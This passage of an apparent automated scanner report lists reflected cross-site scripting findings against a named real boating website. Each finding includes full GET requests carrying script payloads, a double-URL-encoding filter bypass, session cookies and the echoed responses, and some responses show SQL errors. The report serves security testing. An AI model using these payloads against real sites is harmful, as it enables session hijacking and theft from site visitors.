Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/advertise?a3409"><script>alert(1)</script>2e24591c134=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1372. http://www.soundingsonline.com/archives ['"--> parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The value of the '"--></style></script><script>alert(0x001E2B)</script> request parameter is copied into the HTML document as plain text between tags. The payload c4e94<a>353682fa55e was submitted in the '"--></style></script><script>alert(0x001E2B)</script> parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script>c4e94<a>353682fa55e HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=jfj578l38bjt9jl82m4g7tr920; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
</script>c4e94<a>353682fa55e' AND co' at line 1</font>
...[SNIP]...

4.1373. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9a4f6<a>1bd7300bcc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script>&9a4f6<a>1bd7300bcc0=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=0mofbqpbltb8gduh5me9ne6ql3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
</script>&9a4f6<a>1bd7300bcc0=1' AND' at line 1</font>
...[SNIP]...

4.1374. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa446%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb3bb3a680e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa446"><script>alert(1)</script>bb3bb3a680e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop?aa446%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb3bb3a680e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop?aa446"><script>alert(1)</script>bb3bb3a680e=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1375. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 777a1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d991553d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 777a1"><script>alert(1)</script>1d991553d87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/know-how?777a1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d991553d87=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/know-how?777a1"><script>alert(1)</script>1d991553d87=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1376. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1582c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e430c4650db4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1582c"><script>alert(1)</script>430c4650db4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/new-boats?1582c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e430c4650db4=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/new-boats?1582c"><script>alert(1)</script>430c4650db4=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1377. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1f05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e10548a0b938 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1f05"><script>alert(1)</script>10548a0b938 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/new-gear?e1f05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e10548a0b938=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/new-gear?e1f05"><script>alert(1)</script>10548a0b938=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1378. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92b7d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee206520e3f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92b7d"><script>alert(1)</script>e206520e3f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/on-powerboats?92b7d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee206520e3f2=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/on-powerboats?92b7d"><script>alert(1)</script>e206520e3f2=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1379. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 762e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef7a555db9a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 762e6"><script>alert(1)</script>f7a555db9a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/on-sailboats?762e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef7a555db9a8=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/on-sailboats?762e6"><script>alert(1)</script>f7a555db9a8=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1380. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99846%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cbca046523 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99846"><script>alert(1)</script>1cbca046523 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/q-a-a?99846%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cbca046523=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/q-a-a?99846"><script>alert(1)</script>1cbca046523=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1381. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca2b2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7d3c3496f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca2b2"><script>alert(1)</script>b7d3c3496f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/sea-savvy?ca2b2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7d3c3496f0=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/sea-savvy?ca2b2"><script>alert(1)</script>b7d3c3496f0=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1382. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c19f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e422cb04ddca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c19f9"><script>alert(1)</script>422cb04ddca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/tech-talk?c19f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e422cb04ddca=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/tech-talk?c19f9"><script>alert(1)</script>422cb04ddca=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1383. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

